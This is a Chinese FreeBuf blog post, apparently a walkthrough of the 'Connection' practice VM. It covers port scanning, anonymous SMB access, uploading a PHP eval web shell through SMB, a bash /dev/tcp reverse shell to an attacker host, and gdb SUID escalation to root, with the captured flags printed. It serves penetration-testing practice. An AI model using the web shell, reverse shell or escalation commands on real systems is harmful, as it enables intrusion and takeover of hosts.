freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

红队专项·Connection
wIngy 2023-06-08 10:03:56 143530
所属地 重庆

前言
作为自己的专项练习,力求培养渗透思维,熟悉工具使用,愿与诸君共勉之

信息收集

nmap探测目标IP
nmap -sT --min-rate 10000 -p- 192.168.56.0/24
Nmap scan report for 192.168.56.101
Host is up (0.00075s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

nmap针对目标IP开放端口进行更加详细的扫描
nmap -sT -sV -sC -A -p22,80,139,445 192.168.56.101
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7e601b5f906a1ea40042944f4df22a1 (RSA)
|   256 fb1694df9389c7568584229ea0be7c95 (ECDSA)
|_  256 452efb8704ebd18b926f6aea5aa2a11c (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CONNECTION; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
| smb2-time: 
|   date: 2023-06-07T04:02:15
|_  start_date: N/A
|_nbstat: NetBIOS name: CONNECTION, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: connection
|   NetBIOS computer name: CONNECTION\x00
|   Domain name: \x00
|   FQDN: connection
|_  System time: 2023-06-07T00:02:15-04:00

我们发现了ssh服务,http服务,smb服务。接下来逐个击破

SSH服务渗透

这个前期没什么好说的,无非以下几种入侵手段:

  • 爆破
  • ssh密钥泄露
  • 私钥可写

这个靶场无利用条件

HTTP服务渗透

页面浏览,发现为apache的默认页面

image

目录爆破,无有效信息

dirsearch -u http://192.168.56.101/
[12:10:23] 200 -   10KB - /index.html

gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.101/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/06/07 12:00:03 Starting gobuster in directory enumeration mode
===============================================================
/server-status        (Status: 403) [Size: 279]
Progress: 219085 / 220561 (99.33%)===============================================================
2023/06/07 12:00:17 Finished
===============================================================

web应用程序探测(中间件探测)

whatweb http://192.168.56.101/
http://192.168.56.101/ [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[192.168.56.101], Title[Apache2 Debian Default Page: It works]

image

结果也没有什么有趣的信息,帮助不大

SMB服务渗透(突破口)

enum4linux -A 192.168.56.101
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Jun  7 12:42:04 2023

 =========================================( Target Information )=========================================

Target ........... 192.168.56.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.101 )===========================


[+] Got domain/workgroup name: WORKGROUP


 ==================================( Session Check on 192.168.56.101 )==================================


[+] Server 192.168.56.101 allows sessions using username '', password ''


 ===============================( Getting domain SID for 192.168.56.101 )===============================



[+] Can't determine if host is part of domain or part of a workgroup

enum4linux complete on Wed Jun  7 12:42:04 2023
我们可以看到smb可以进行空密码访问

smbclient -N -L \\\\192.168.56.101 (-N不询问密码,-L列出)

image

确实支持匿名登录,且存在一个share文件夹可以看,希望能出货

image

image

html文件夹里面有个index.html,是apache的默认页面

但是吧到这里,哈哈好像就没啥思路跟想法了。

我网上搜索了一下,使用msf进行攻击尝试(失败)

image

最后的最后终于发现smb支持put协议进行文件上传,那就来吧

smb服务之put任意文件上传getshell

为什么就找到这个点了勒,起初文件可以下载然后我就疯狂搜smb支持的上传协议,功夫不负有心人发现了PUT

image

那就事情就水到渠成了,因为我们还不知道后端语言,首先尝试php的马子

<?php
  echo "<pre>" . @eval($_REQUEST['cmd']) . "</pre>";
?>

image

验证一下

image

直接上蚁剑进行操作

找到用户的flag

3f491443a2a6aa82bc86a3cda8c39617

image

权限提升

兜兜转转,最后发现gdb这个可执行二进制文件有SUID位的权限

查找SUID
find / -perm -4000 2>/dev/null

image

参考gtfobins的提权手法

image

不过具体操作的时候出现了一点意外,蚁剑的虚拟终端出现了问题,稳定不了rootshell

image

我把它弹回kali上了

bash -c "bash -i >%26 /dev/tcp/192.168.56.102/443 0>%261"

稳定shell
script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
然后你就会发现你的shell有补全有删除、

/usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

image

拿root权限a7c6ea4931ab86fb54c5400204474a39

参考文章

https://book.hacktricks.xyz/network-services-pentesting/pentesting-smb

https://www.cnblogs.com/whitedream-/p/14100043.html

https://gtfobins.github.io/gtfobins/gdb/#suid

# 漏洞 # 渗透测试 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 wIngy 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
红队专项
wIngy LV.3
jocker!!!
  • 7 文章数
  • 6 关注者
红队专项·Icarus
2023-06-17
红队专项·Five
2023-06-13
红队专项·BaseME
2023-06-12